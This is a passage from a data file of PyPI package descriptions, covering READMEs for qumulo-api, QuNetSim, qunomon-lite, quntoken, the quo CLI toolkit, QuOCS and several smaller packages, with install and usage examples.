userUserApiv1_users_change_unactivated_email_postPOST/v1/users/change-unactivated-emailAllows a user who has not yet activated their account to change their email address. This will not work if the user account associated with the email address has already been activatedUserApiv1_users_confirm_registration_postPOST/v1/users/confirm-registrationConfirms registration of new user account.UserApiv1_users_forgot_password_postPOST/v1/users/forgot-passwordSends a secret token to the user's email to allow password reset.UserApiv1_users_getGET/v1/usersProvides the user details for a user with valid JWT in the Authorize headerUserApiv1_users_login_postPOST/v1/users/loginProvides a JWT bearer token for valid email and passwordUserApiv1_users_postPOST/v1/usersCreates a new user with the submitted data.UserApiv1_users_putPUT/v1/usersUpdates a user's registration details. Note that the if the email address has changed, the account will be set to inactive until the account is activated with the secret token.UserApiv1_users_resend_activation_email_postPOST/v1/users/resend-activation-emailSends a new activation email for the user's account. This will not work if the user account associated with the email address has already been activated.UtilApiv1_utils_repair_wkt_polygon_postPOST/v1/utils/repair-wkt-polygonChecks a WKT polygon to ensure validity. If the polygon is invalid, it attempts to construct a valid polygon that matches the original as closely as possible.Documentation For ModelsAccountActivationRequestDTOAdminEditorRequestDTOAdminEditorRequestListDTOArtefactDTOArtefactDataDTOArtefactDataListDTOArtefactGroupDTOArtefactGroupListDTOArtefactListDTOArtefactTextFragmentMatchDTOArtefactTextFragmentMatchListDTOAttributeDTOAttributeListDTOAttributeValueDTOBatchEditRoiDTOBatchEditRoiResponseDTOBatchUpdateArtefactPlacementDTOBatchUpdatedArtefactTransformDTOCatalogueMatchDTOCatalogueMatchInputDTOCatalogueMatchListDTOCharacterShapeDTOCommentaryCreateDTOCommentaryDTOCreateArtefactDTOCreateArtefactGroupDTOCreateAttributeDTOCreateAttributeValueDTOCreateTextFragmentDTODeleteDTODeleteTokenDTODetailedEditorRightsDTODetailedUserDTODetailedUserTokenDTODirectionEditionCopyDTOEditionDTOEditionEntitiesEditionGroupDTOEditionListDTOEditionManuscriptMetricsDTOEditionScriptCollectionDTOEditionScriptLinesDTOEditionUpdateRequestDTOEditorDTOEditorInvitationDTOEditorInvitationListDTOImageDTOImageInstitutionDTOImageInstitutionListDTOImageStackDTOImagedObjectDTOImagedObjectListDTOImagedObjectTextFragmentMatchDTOImagedObjectTextFragmentMatchListDTOInstitutionalImageDTOInstitutionalImageListDTOInterpretationAttributeCreateDTOInterpretationAttributeDTOInterpretationRoiDTOInterpretationRoiDTOListInviteEditorDTOLightingLineDTOLineDataDTOLineDataListDTOLineTextDTOLoginRequestDTONewUserRequestDTONextSignInterpretationDTOPermissionDTOPlacementDTOResendUserAccountActivationRequestDTOResetForgottenUserPasswordRequestDTOResetLoggedInUserPasswordRequestDTOResetUserPasswordRequestDTOScriptArtefactCharactersDTOScriptLineDTOScriptTextFragmentDTOSetInterpretationRoiDTOSetInterpretationRoiDTOListSideDesignationSignDTOSignInterpretationCreateDTOSignInterpretationDTOSignInterpretationListDTOSimpleImageDTOSimpleImageListDTOTextEditionDTOTextFragmentDTOTextFragmentDataDTOTextFragmentDataListDTOTranslateDTOUnactivatedEmailUpdateRequestDTOUpdateArtefactDTOUpdateArtefactGroupDTOUpdateArtefactPlacementDTOUpdateAttributeDTOUpdateAttributeValueDTOUpdateEditionManuscriptMetricsDTOUpdateEditorRightsDTOUpdateInterpretationRoiDTOUpdateInterpretationRoiDTOListUpdateTextFragmentDTOUpdatedArtefactPlacementDTOUpdatedInterpretationRoiDTOUpdatedInterpretationRoiDTOListUserDTOUserUpdateRequestDTOWktPolygonDTODocumentation For AuthorizationBearerType: API keyAPI key parameter name: AuthorizationLocation: HTTP headerAuthor"} +{"package": "qumulo-api", "pacakge-description": "This package contains the Qumulo Core Python SDK and the qq CLI utility, which\nallow users to interact with the Qumulo REST API server.Using the Python SDKTo get started, import theRestClientclass from thequmulo.rest_clientmodule and create an instance. TheRestClientclass contains attributes\nthat allow programmatic access to all of the Qumulo Core REST API endpoints.For example:from qumulo.rest_client import RestClient\n\n# Create an instance of RestClient associated with the Qumulo Core file\nsystem at qumulo.mycompany.net\nrc = RestClient(\"qumulo.mycompany.net\", 8000)\n\n# Log in to Qumulo Core using local user or Active Directory credentials\nrc.login(\"username\", \"password\")\n\n# Print all of the SMB share configuration information\nprint(rc.smb.smb_list_shares())To inspect the various available properties, open a Python REPL and run the\nfollowing commands:from qumulo.rest_client import RestClient\n\nrc = RestClient(\"qumulo.mycompany.net\", 8000)\n\n# See REST API groups:\n[p for p in dir(rc) if not p.startswith('_')]\n\n# See SDK endpoints within a particular API group\n[p for p in dir(rc.quota) if not p.startswith('_')]Using qqAfter installing the qumulo-api package, theqqCLI utility will be installed\nin your system.Note: On Windows,qq.execan be found under theScripts\\directory in your\nPython installation. Adding this path your your%%PATH%%environment variable\nwill allow you to runqq.exewithout prefixing it with the full path.To see all commands available from theqqtool:$ qq --helpTo run most commands against the REST API server, you must first login:$ qq --host host_ip login --user adminOnce authenticated, you can run other commands:# Get the network configuation of nodes in the cluster:\n$ qq --host network_poll\n\n# Get the list of users\n$ qq --host auth_list_users\n\n# Get help with a specific command\n$ qq --host auth_list_users --helpTo see the information about the actual HTTP requests and responses sent over\nthe wire for a particular command, use the\u2013debugflag:$ qq --host --debug smb_settings_get\n REQUEST: GET https://:8000/v1/smb/settings\n REQUEST HEADERS:\n User-Agent: qq\n Content-Type: application/json\n Content-Length: 0\n Authorization: Bearer \n RESPONSE STATUS: 200\n RESPONSE:\n Date: Fri, 18 Mar 2022 22:15:47 GMT\n ETag: \"VNhqnQ\"\n Content-Type: application/json\n Content-Length: 329\n Strict-Transport-Security: max-age=31536000; includeSubdomain\n\n\n {'session_encryption': 'NONE', 'supported_dialects': ['SMB2_DIALECT_2_002', 'SMB2_DIALECT_2_1', 'SMB2_DIALECT_3_0', 'SMB2_DIALECT_3_11'], 'hide_shares_from_unauthorized_users': False, 'hide_shares_from_unauthorized_hosts': False, 'snapshot_directory_mode': 'VISIBLE', 'bypass_traverse_checking': False, 'signing_required': False}NotesFor more information, visit our Knowledge Base site:https://care.qumulo.com"} +{"package": "qunetsim", "pacakge-description": "QuNetSimQuNetSim is a quantum-enabled network simulator that adds common quantum networking tasks like teleportation, superdense coding, sharing EPR pairs, etc. With QuNetSim, one can design and test robust quantum network protocols under various network conditions.Installation and DocumentationSeehttps://tqsd.github.io/QuNetSim/for documentation. To install the latest release via pip:pip install qunetsimQuick Start GuideTemplaterThe QuNetSim pip package comes with a templater. After installing the library, simply typetemplateand follow the instructions. A template QuNetSim example will be generated.Quick Examplefrom qunetsim.components import Host, Network\n\nnetwork = Network.get_instance()\nnetwork.start()\n\nalice = Host('Alice')\nbob = Host('Bob')\n\nalice.add_connection(bob.host_id)\nbob.add_connection(alice.host_id)\n\nalice.start()\nbob.start()\n\nnetwork.add_hosts([alice, bob])\n\n# Block Alice to wait for qubit arrive from Bob\nalice.send_epr(bob.host_id, await_ack=True)\nq_alice = alice.get_epr(bob.host_id)\nq_bob = bob.get_epr(alice.host_id)\n\nprint(\"EPR is in state: %d, %d\" % (q_alice.measure(), q_bob.measure()))\nnetwork.stop(True)ContributingFeel free to contribute by adding Github issues and pull requests. Adding test cases for any contributions is a requirement for any pull request to be merged.Citation@article{diadamo2020qunetsim,\n title={QuNetSim: A Software Framework for Quantum Networks},\n author={DiAdamo, Stephen and N{\\\"o}tzel, Janis and Zanger, Benjamin and Be{\\c{s}}e, Mehmet Mert},\n journal={IEEE Transactions on Quantum Engineering},\n year={2021},\n doi={10.1109/TQE.2021.3092395}\n}"} +{"package": "qunix-tools", "pacakge-description": "QuNiXQuNiX is a project of Unix like python programs by using Qiskit and Quantum Circuit with followingUnix PhilosophyPrograms useMicroQiskitandQiskitProgram ListQuantum Circuit Builder(QCB)QCB_DrawAleaQArtQSayUsageIn Terminal$pip install qunix-tools\n\n$qcb -q 3 -c 3 \"h 0 h 1 h 2 m .\"\n\n$qcb_draw -q 2 -c 2 \"h 0 h 1 m .\"\n\n$alea -f happySlack ImplementationQiriBy running our programs as backend of Slack Bot, Qiri will get the input from the chat to it, and give us the output of programs.\nThis means we can run theQCBandAleaanytime we want in Slack.Share the result of qauntum computation and qauntum quotes randomly selected by measuring superposition of qubitsThis project is for IBM'sQiskit-Hackerthon-Korea-2021CreditQiskit(https://github.com/Qiskit/qiskit)MicroQiskit(https://github.com/qiskit-community/MicroQiskit)LicencseApache License 2.0"} +{"package": "qunomon-lite", "pacakge-description": "qunomon-lite: Lightweight tool for using Qunomon, AITQunomon\u304a\u3088\u3073AIT(AI system Test package)\u306e\u7c21\u6613\u5229\u7528\u30c4\u30fc\u30eb\ud83d\udccc DescriptionQunomon\u304c\u63d0\u4f9b\u3059\u308b\u4e00\u90e8\u306e\u6a5f\u80fd\u3092\u7c21\u6613\u7684\u306b\u5229\u7528\u3067\u304d\u308b\u3001\u30b3\u30de\u30f3\u30c9\u30e9\u30a4\u30f3\u30fbPython\u30c4\u30fc\u30eb\u3067\u3059\u3002\nQunomon\u3092\u8d77\u52d5\u3059\u308b\u3053\u3068\u306a\u304fAIT(AI system Test package)\u3092\u5b9f\u884c\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\n\u4e0b\u8a18\u306b\u6319\u3052\u308b\u3088\u3046\u306a\u30e6\u30fc\u30b9\u30b1\u30fc\u30b9\u306b\u304a\u3044\u3066\u3001ML\u958b\u767a\u8005\u304cPoC\u3084\u958b\u767a\u6642\u306b\u30b3\u30de\u30f3\u30c9\u30e9\u30a4\u30f3\u3084Python\u30d7\u30ed\u30b0\u30e9\u30e0\u30fbJupyter\u30ce\u30fc\u30c8\u30d6\u30c3\u30af\u304b\u3089\u5229\u7528\u3057\u305f\u308a\u3001ML\u958b\u767a\u30d1\u30a4\u30d7\u30e9\u30a4\u30f3\u4e0a\u3067\u5229\u7528\u3055\u308c\u308b\u3053\u3068\u3092\u60f3\u5b9a\u3057\u3066\u3044\u307e\u3059\u3002ML\u958b\u767a\u8005\u304c\u3001\u81ea\u8eab\u306e\u958b\u767a\u74b0\u5883\u3067\u3001Qunomon\u306eAI\u30b7\u30b9\u30c6\u30e0\u8a55\u4fa1\u30d1\u30c3\u30b1\u30fc\u30b8\uff08AIT: AI system Test package\uff09\u3092\u304a\u8a66\u3057\u3067\u4f7f\u3063\u3066\u307f\u305f\u3044ML\u958b\u767a\u8005\u304c\u3001Qunomon\u306e\u54c1\u8cea\u30ec\u30dd\u30fc\u30c8\u3092\u57fa\u306b\u3001ML\u30e2\u30c7\u30eb\u306e\u6539\u5584\u5bfe\u5fdc\u3092\u884c\u3063\u3066\u3044\u3066\u3001AIT\u3092\u30ef\u30f3\u30bf\u30a4\u30e0\u3067\u5b9f\u884c\u3057\u3066\u6539\u5584\u5177\u5408\u3092\u898b\u305f\u3044ML\u958b\u767a\u30d1\u30a4\u30d7\u30e9\u30a4\u30f3\u306b\u3066\u3001AIT\u3092\u5b9f\u884c\u3057\u3001\u54c1\u8cea\u6307\u6a19\u3068\u3057\u3066\u6d3b\u7528\u3057\u305f\u3044Note: \u5f53\u30c4\u30fc\u30eb\u306fQunomon\u3092\u7f6e\u304d\u63db\u3048\u308b\u3082\u306e\u3067\u306f\u3042\u308a\u307e\u305b\u3093\u3002\u30e6\u30fc\u30b9\u30b1\u30fc\u30b9\u306b\u3088\u3063\u3066\u3001Qunomon\u306e\u5229\u7528\u3092\u691c\u8a0e\u304f\u3060\u3055\u3044\u3002\u2705 Features\u300cAIT\u306e\u5b9f\u884c\u300d\u3084\u300cAIT\u306e\u5b9f\u884c\u7d50\u679c\u8868\u793a\u300d\u306b\u95a2\u3057\u3066\u3001\u3088\u308a\u67d4\u8edf\u306a\u4f7f\u3044\u65b9\u3092\u5b9f\u73fe\u3059\u308b\u6a5f\u80fd\u3092\u63d0\u4f9b\u3057\u307e\u3059\u3002\u6a5f\u80fda. AIT\u306e\u5b9f\u884c\u2705 \u30ed\u30fc\u30ab\u30eb\u74b0\u5883\uff08Docker\uff09\u3067AIT\u5b9f\u884c\u2705 \u30d1\u30d6\u30ea\u30c3\u30afAIT\u306e\u5229\u7528\u2b1b \u30d7\u30e9\u30a4\u30d9\u30fc\u30c8AIT\u306e\u5229\u7528\u6a5f\u80fdb. AIT\u306e\u5b9f\u884c\u7d50\u679c\u8868\u793a\u2705 AIT\u30ed\u30fc\u30ab\u30eb\u5b9f\u884c\u7d50\u679c\u306e\u95b2\u89a7\u2b1b AIT\u30ed\u30fc\u30ab\u30eb\u5b9f\u884c\u7d50\u679c\u306e\u6e2c\u5b9a\u5024\uff08Measures\uff09\u306e\u53d6\u5f97\u2b1b AIT\u30ed\u30fc\u30ab\u30eb\u5b9f\u884c\u7d50\u679c\u306e\u4e00\u89a7\ud83d\udcbe InstallRequirementsdockersudo\u7121\u3057\u3067docker\u30b3\u30de\u30f3\u30c9\u304c\u5b9f\u884c\u3067\u304d\u308b\u3053\u3068python 3.x, pipStepInstallpipinstallqunomon-lite\u958b\u767a\u4e2d\u306e\u6700\u65b0\u306fGitHub\u30ea\u30dd\u30b8\u30c8\u30ea\u304b\u3089\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3067\u304d\u307e\u3059pipinstall-Ugit+https://github.com/ads-ad-itcenter/qunomon-lite.git\ud83d\ude80 Usage\u4f7f\u7528\u4f8b:CUI:examples/example-cli.mdPython:examples/example-notebook.ipynbAIT\u306e\u5b9f\u884c\uff08\u30d1\u30d6\u30ea\u30c3\u30afAIT\uff09\u5b9f\u884c\u3057\u305f\u3044AIT\u3092\u63a2\u3057\u3001AIT\u6bce\u306b\u63d0\u4f9b\u3055\u308c\u3066\u3044\u308bait.manifest.json\u3092\u53c2\u7167\u3057\u3066\u3001\u5b9f\u884c\u306b\u5fc5\u8981\u3068\u306a\u308b\u30d5\u30a1\u30a4\u30eb\u3084\u30d1\u30e9\u30e1\u30fc\u30bf\u3092\u7528\u610f\u3057\u3066\u304a\u304f\u63a2\u3059\u5834\u6240: Qunomon\u306eGitHub\u30ea\u30dd\u30b8\u30c8\u30ea\u304b\u3089\n\u4f8b:https://github.com/aistairc/qunomon/blob/main/ait_repository/ait/eval_mnist_acc_tf2.3_0.1/deploy/container/repository/ait.manifest.jsonAIT\u3092\u5b9f\u884c\u3057\u3001\u7d50\u679c\u3092\u8868\u793aCUI:qunomon-liteaitrun:[--inventories=...][--params=...]qunomon-liteaitresult-showPython:fromqunomon_liteimportaitresult=ait.run(':',inventories={'':'',...},params={'':'',...},)result.show()AIT\u306e\u5b9f\u884c\u7d50\u679c\u8868\u793aAIT\u5b9f\u884c\u7d50\u679c\u306e\u95b2\u89a7CUI:qunomon-liteaitresult-show{latest|}Python:result=ait.result(\u672a\u6307\u5b9aor'latest'or'')# \u672a\u6307\u5b9a or 'latest': \u6700\u65b0\u306e\u5b9f\u884c\u7d50\u679cresult.show()\u2139\ufe0f Anything elseTroubleshootingqunomon-lite\u30b3\u30de\u30f3\u30c9\u304c\u898b\u3064\u304b\u3089\u306a\u3044\uff08command not found\uff09$qunomon-lite--help\nqunomon-lite:commandnotfoundDebian\u30d1\u30c3\u30b1\u30fc\u30b8\u306epip\u30b3\u30de\u30f3\u30c9\uff08python3-pip\uff09\u306f\u3001\u4e00\u822c\u30e6\u30fc\u30b6\u3067pip install\u3059\u308b\u3068\u3001\u30c7\u30d5\u30a9\u30eb\u30c8\u3067~/.local\u306b\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u308b\u3088\u3046\u3067\u3059\uff08--user\u30aa\u30d7\u30b7\u30e7\u30f3\u304c\u81ea\u52d5\u3067\u4ed8\u4e0e\uff09\u3002\n\u305d\u306e\u305f\u3081\u3001Debian\u7cfb\u306eOS\uff08Debian, Ubuntu,,,\uff09\u3067\u3001\u5404OS\u30d1\u30c3\u30b1\u30fc\u30b8\u306epip\u3092\u5229\u7528\u3057\u3066\u3044\u308b\u5834\u5408\uff08\u4f8b.sudo apt install python3-pip\uff09\u306f\u3001~/.local/bin\u306bPATH\u3092\u901a\u3057\u3066\u307f\u3066\u304f\u3060\u3055\u3044\u3002# for example...$exportPATH=\"$HOME/.local/bin:$PATH\"AIT\u5b9f\u884c\u3067PermissionError\u304c\u767a\u751f\uff08Permission denied\uff09$qunomon-literunqunomon/eval_mnist_acc_tf2.3:0.1...\n\n...\nRunningdockercontainer(image:qunomon/eval_mnist_acc_tf2.3:0.1)...\nErrorwhilefetchingserverAPIversion:('Connection aborted.',PermissionError(13,'Permission denied'))\u5f53\u30c4\u30fc\u30eb\u30fb\u30d1\u30c3\u30b1\u30fc\u30b8\u3092\u5229\u7528\u3059\u308b\u306b\u306f\u3001\u5b9f\u884c\u30e6\u30fc\u30b6\u30fc\u304c\u3001sudo\u305b\u305a\u306bdocker\u30b3\u30de\u30f3\u30c9\u304c\u5229\u7528\u3067\u304d\u308b\u5fc5\u8981\u304c\u3042\u308a\u307e\u3059\u3002# for example...$sudousermod-aGdocker$USER\ud83d\udccb LICENCEApache License 2.0"} +{"package": "qunqunpdf", "pacakge-description": "This is the home page of our project."} +{"package": "quntest", "pacakge-description": "come back to this in a second"} +{"package": "quntoken", "pacakge-description": "quntokenNew Hungarian tokenizer based on quex and huntoken.\nThis tool is alsointegratedinto thee-magyarlanguage processing system\nunder the nameemToken.RequirementsOS: linux x86-64python 3.6+Developer requirements:python 2.7 (for quex)g++ = 5Installpip3installquntokenUsageCommand linequntokenreads plain text in UTF-8 from STDIN and writes to STDOUT.The default (and recommended) format of output is TSV. It has two columns.\nThe first contains the token, the second contains the white space sequence\nafter the token. Sentence boundaries are marked with empty lines.Example: tokenizinginput.txtfile, writing the TSV output intooutput.tsvfile.quntoken output.tsvOptional arguments:-h, --help show this help message and exit\n -f FORM, --form FORM Valid formats: json, tsv, xml and spl (sentence per\n line). Default format: tsv.\n -m MODE, --mode MODE Modes: sentence or token. Default: token\n -w, --word-break Eliminate word break from end of lines.\n -v, --version show program's version number and exitPython APIquntoken.tokenize(inp=sys.stdin, form='tsv', mode='token',\nword_break=False)Entry point, returns an iterator object. Parameters:inp: Input iterator, default:sys.stdin.form: Format of output. Valid formats:'tsv'(default),'json','xml'and'spl'(sentence per line).mode:'sentence'(only sentence segmenting) or'token'(full\ntokenization - default).word_break: If'True', eliminates word break from end of lines. Default:'False'.Example:fromquntokenimporttokenizefortokintokenize(open('input.txt')):print(tok,end='')"} +{"package": "quo", "pacakge-description": "Forever ScalableQuois a toolkit for writing Command-Line Interface(CLI) applications and a TUI (Text User Interface) framework for Python.Quo is making headway towards composing speedy and orderly CLI and TUI applications while forestalling any disappointments brought about by the failure to execute a python application.\nSimple to code, easy to learn, and does not come with needless baggage.CompatibilityQuo works flawlessly with Linux, OSX, and Windows.\nQuo requires Python3.8or later.FeaturesSupport for Ansi, RGB and Hex color modelsSupport for tabular presentation of dataIntuitive progressbarsCode completionsNesting of commandsCustomizable Text User Interface(TUI)dialogs.Automatic help page generationSyntax highlightingAutosuggestionsKey BindersGetting StartedInstallationYou can install quo via the Python Package Index (PyPI)pip install -U quoIn order to check your installation you can usepython -m pip show quoRun the following to test Quo output on your terminal:python -m quo:bulb: pressCtrl-cto exitQuo LibraryQuo contains a number of builtin features you c\nan use to create elegant output in your CLI.Quo echoTo output formatted text to your terminal you can import theechomethod.\nTry this:Example 1fromquoimportechoecho(\"Hello, World!\",fg=\"red\",italic=True,bold=True)Example 2fromquoimportechoecho(\"Blue on white\",fg=\"blue\",bg=\"white\")Alternatively, you can importprintExample 1fromquoimportprintprint('This is bold')print('This is italic')Example 2fromquoimportprintprint('This is underlined')Example 3fromquoimportprintprint(\"Quo is \")Example 4# Colors from the ANSI palette.print('This is red')print('\")Example 5Here's an example of a multiline bottom toolbar.fromquo.promptimportPromptsession=Prompt()session.prompt(\"Say something: \",bottom_toolbar=\"This is\\na multiline toolbar\")Example 6Placeholder textA placeholder text that's displayed as long as no input s given.:bulb: This won't be returned as part of the output.fromquo.promptimportPromptsession=Prompt()session.prompt(\"What is your name?: \",placeholder='(please type something)')Example 7Coloring the prompt.fromquo.promptimportPromptsession=Prompt(fg=\"red\")session.prompt(\"Type something: \")Example 8Autocomplete textPress [Tab] to autocompletefromquo.promptimportPromptfromquo.completionimportWordCompleterexample=WordCompleter(['USA','UK','Canada','Kenya'])session=Prompt(completer=example)session.prompt('Which country are you from?: ')Example 9Autosuggest textAuto suggestion is a way to propose some input completions to the user. Usually, the input is compared to the history and when there is another entry starting with the given text, the completion will be shown as gray text behind the current input.\nPressing the right arrow \u2192 or ctrl-e will insert this suggestion, alt-f will insert the first word of the suggestion.fromquo.historyimportMemoryHistoryfromquo.promptimportPromptMemoryHistory.append(\"import os\")MemoryHistory.append('print(\"hello\")')MemoryHistory.append('print(\"world\")')MemoryHistory.append(\"import path\")session=Prompt(history=MemoryHistory,suggest=\"history\")whileTrue:session.prompt('> ')Read more onPromptQuo BarDraw a horizontal bar with an optional title, which is a good way of dividing your terminal output in to sections.fromquo.barimportBarbar=Bar(\"I am a bar\")bar.draw()Styled barfromquo.barimportBarbar=Bar(\"I am a styled bar\")bar.draw(fg=\"blue\",bg=\"yellow\")Right alignedfromquo.barimportBarbar=Bar(\"I am right aligned\")bar.draw(align=\"right\")Quo ConsoleFor more control over quo terminal content, import and construct aConsoleobject.Launching ApplicationsQuo supports launching applications throughConsole.launchExample 1fromquo.consoleimportConsoleconsole=Console()console.launch(\"https://quo.rtfd.io/\")Example 2fromquo.consoleimportConsoleconsole=Console()console.launch(\"/home/path/README.md\",locate=True)Spin\ud83d\udd01Quo can create a context manager that is used to display a spinner on stdout as long as the context has not exitedimporttimefromquo.consoleimportConsoleconsole=Console()withconsole.spin():time.sleep(3)print(\"Hello, World\")Read more onConsoleQuo DialogsHigh level API for displaying dialog boxes to the user for informational purposes, or to get input from the user.Example 1Message Box dialogfromquo.dialogimportMessageBoxMessageBox(title='Message window',text='Do you want to continue?\\nPress ENTER to quit.')Example 2Input dialogfromquo.dialogimportInputBoxInputBox(title='PromptBox Shenanigans',text='What Country are you from?:')Multiline Input dialogfromquo.dialogimportInputBoxInputBox(title='PromptBox Shenanigans',text='What Country are you from?:',multiline=True)Password Input dialogfromquo.dialogimportInputBoxInputBox(title='PromptBox Shenanigans',text='What Country are you from?:',hide=True)Radiolistfromquo.dialogimportRadiolistBoxRadiolistBox(title=\"RadioList dialog example\",text=\"Which breakfast would you like ?\",values=[(\"breakfast1\",\"Eggs and beacon\"),(\"breakfast2\",\"French breakfast\"),(\"breakfast3\",\"Equestrian breakfast\")])Read more onDialogsQuo Key Binding\ud83d\udd10A key binding is an association between a physical key on akeyboard and a parameter.fromquoimportechofromquo.keysimportbindfromquo.promptimportPromptsession=Prompt()# Print \"Hello world\" when ctrl-h is pressed@bind.add(\"ctrl-h\")def_(event):echo(\"Hello, World!\")session.prompt(\"\")Read more onKey bindingsQuo ParserYou can parse optional and positional arguments with Quo and generate help pages for your command-line tools.fromquo.parseimportParserparser=Parser(description=\"This script prints hello NAME COUNT times.\")parser.argument('--count',default=3,type=int,help='number of greetings')parser.argument('name',help=\"The person to greet\")arg=parser.parse()forxinrange(arg.count):print(f\"Hello{arg.name}!\")$pythonprog.pyJohn--count4And what it looks like:Here's what the help page looks like:$pythonprog.py--helpRead more onParserQuo ProgressBarCreating a new progress bar can be done by calling the classProgressBarThe progress can be displayed for any iterable. This works by wrapping the iterable (likerange) with the classProgressBarimporttimefromquo.progressimportProgressBarwithProgressBar()aspb:foriinpb(range(800)):time.sleep(.01)Read more onProgressQuo RuleUsed for drawing a horizontal line.Example 1fromquo.ruleimportRulerule=Rule()rule.draw()Example 2A styled line.fromquo.ruleimportRulerule=Rule()rule.draw(color=\"purple\")Example 3A multicolored line.fromquo.ruleimportRulerule=Rule()rule.draw(multicolored=True)Quo TablesThis offers a number of configuration options to set the look and feel of the table, including how borders are rendered and the style and alignment of the columns.Example 1fromquo.tableimportTabledata=[[\"Name\",\"Gender\",\"Age\"],[\"Alice\",\"F\",24],[\"Bob\",\"M\",19],[\"Dave\",\"M\",24]]table=Table(data)table.print()Example 2Right aligned tablefromquo.tableimportTabledata=[[\"Name\",\"Gender\",\"Age\"],[\"Alice\",\"F\",24],[\"Bob\",\"M\",19],[\"Dave\",\"M\",24]]table=Table(data)table.print(align=\"right\")Example 3Colored tablefromquo.tableimportTabledata=[[\"Name\",\"Gender\",\"Age\"],[\"Alice\",\"F\",24],[\"Bob\",\"M\",19],[\"Dave\",\"M\",24]]table=Table(data)table.print(fg=\"green\")Example 4Column widthIn situations where fields are expected to reasonably be too long to look good as a single line, parametercolumn_widthcan help automate word wrapping long fields.fromquo.tableimportTabledata=[[1,'John Smith','This is a rather long description that might look better if it is wrapped a bit']]table=Table(data)table.print(headers=(\"Issue Id\",\"Author\",\"Description\"),column_width=[None,None,30])Example 5Grid tablefromquo.tableimportTabledata=[[\"Name\",\"Gender\",\"Age\"],[\"Alice\",\"F\",24],[\"Bob\",\"M\",19],[\"Dave\",\"M\",24]]table=Table(data)table.print(theme=\"grid\")Read more onTableQuo WidgetsA collection of reusable components for building full screen applications.FrameUsed draw a border around any container, optionally with a title.Read more onFrameLabelWidget that displays text.Read more onLabelBox + Labelfromquoimportcontainerfromquo.boximportBoxfromquo.labelimportLabelcontent=Label(\"Hello, World!\",fg='red',bg='yellow')container(content)Read more onWidgetsFor more intricate examples, have a look in theexamplesdirectory and the documentation.Donate\ud83c\udf81In order to for us to maintain this project and grow our community of contributors.DonateQuo is...SimpleIf you know Python you can easily use quo and it can integrate with just about anything.Getting HelpCommunityFor discussions about the usage, development, and the future of quo, please join our Google communityCommunity\ud83d\udc68\u200d\ud83d\udc69\u200d\ud83d\udc66\u200d\ud83d\udc66ResourcesBug trackerIf you have any suggestions, bug reports, or annoyances please report them\nto our issue tracker atBug trackeror send an email to:\ud83d\udce5scalabli@googlegroups.com|scalabli@proton.meBlogs\ud83d\udcbb\u2192 How to build CLIs usingquoLicense\ud83d\udcd1This software is licensed under theMIT License. See theLicensefile in the top distribution directory for the full license text.Code of ConductCode of Conduct is adapted from the Contributor Covenant,\nversion 1.2.0 available atCode of Conduct"} +{"package": "quocs-lib", "pacakge-description": "The optimization libraryQuOCS (Quantum Optimal Control Suite) is a python software package for model- and experiment-based optimizations of quantum processes.\nIt uses the excellent Numpy and Scipy packages as numerical backends.\nQuOCS aims to provide a user-friendly interface to solve optimization problems. A variety of popular optimal control algorithms are available:GRAPE (GRadient Ascent Pulse Engineering) AlgorithmdCRAB (dressed Chopped RAndom Basis) AlgorithmAD-GRAPE (Automatic Differentiation) Algorithm - for Mac and Linux onlyDirect Search Algorithm, i.e. Nelder Mead, CMA-ES...QuOCS is open source and its interface structure allows for user-friendly customizability. It can be used on all Unix-based platforms and on Windows.InstallationQuOCS is available onpip. You can install QuOCS by doingpipinstallquocs-libThe requirements are:setuptools >= 44.0.0numpy >= 1.19.1scipy >= 1.5.1If you want to use the AD Algorithm, the installation ofJAX(Autograd and XLA) is required. Please note that this package isn't available for Windows.Editable modeIf you want to customize the algortihm and basis inside QuOCS, the package has to be installed in the editable mode. You can easily do that with the following commands:gitclonehttps://github.com/Quantum-OCS/QuOCS.gitcdQuOCS\npipinstall-e.DocumentationThe possiblesettingsfor the JSON file can be foundhere.You can find the latest development documentationhere.A selection of demonstration notebooks is available, which demonstrate some of the many features of QuOCS. These are stored in theQuOCS/QuOCS-jupyternotebooks repositoryhere on GitHub.Example of usageUsing QuOCS is intuitive and simple. The main steps are:Create and load the optimization dictionary. This json file contains all the optimization settings (as an example seethis file).fromquocslib.utils.inputoutputimportreadjsonoptimization_dictionary=readjson(\"opt_dictionary.json\"))Create Figure of Merit object. This is an instance of a class that contains the physical problem to be optimized. In the following, you can see an example of how to define this class. The input and output ofget_FoMshould not be changed.fromquocslib.utils.AbstractFoMimportAbstractFoM# Define problem classclassOneQubit(AbstractFoM):def__init__(self,args_dict:dict=None):\"\"\" Initialize the dynamics variables\"\"\"ifargs_dictisNone:args_dict={}...defget_FoM(self,pulses:list=[],parameters:list=[],timegrids:list=[])->dict:# Compute the dynamics and FoM...return{\"FoM\":fidelity}# Create Figure of Merit objectFoM_object=OneQubit()Define the optimizer by initializing it with the uploaded optimization dictionary and FoM object. After that the execution can be run.fromquocslib.OptimizerimportOptimizer# Define Optimizeroptimization_obj=Optimizer(optimization_dictionary,FoM_object)# Execute the optimizationoptimization_obj.execute()Complete examples are provided inQuOCS/QuOCS-jupyternotebooks repositoryor in thetestsfolders.Usage with QudiIf you want to use QuOCS in combination with Qudi, please have a look atthis repositorywith additional files, information and a tutorial.ContributeWould you like to implement a new algorithm or do you have in mind some new feature it would be cool to have in QuOCS?\nYou are most welcome to contribute to QuOCS development! You can do it by forking this repository and sending pull requests, or filing bug reports at theissues page.\nAll code contributions are acknowledged in thecontributorssection in the documentation. Thank you for your cooperation!Citing QuOCSIf you use QuOCS in your research, please cite ourintroductory software paper.@article{QuocsRossignolo2023,\n title = {{QuOCS: The Quantum Optimal Control Suite}},\n journal = {{C}omputer {P}hysics {C}ommunications},\n pages = {108782},\n year = {2023},\n issn = {0010-4655},\n doi = {https://doi.org/10.1016/j.cpc.2023.108782},\n url = {https://www.sciencedirect.com/science/article/pii/S0010465523001273},\n author = {Marco Rossignolo and Thomas Reisser and Alastair Marshall and Phila Rembold and Alice Pagano and Philipp J. Vetter and Ressa S. Said and Matthias M. M\u00fcller and Felix Motzoi and Tommaso Calarco and Fedor Jelezko and Simone Montangero}\n}Authors and contributorsMarco RossignoloThomas ReisserAlastair MarshallPhila RemboldAlice Pagano"} +{"package": "quoicoubeh", "pacakge-description": "https://fr.wiktionary.org/wiki/quoicoubeh"} +{"package": "quoine", "pacakge-description": "UNKNOWN"} +{"package": "quoinex-client", "pacakge-description": "quoinex-client is a python client (sync/async) library 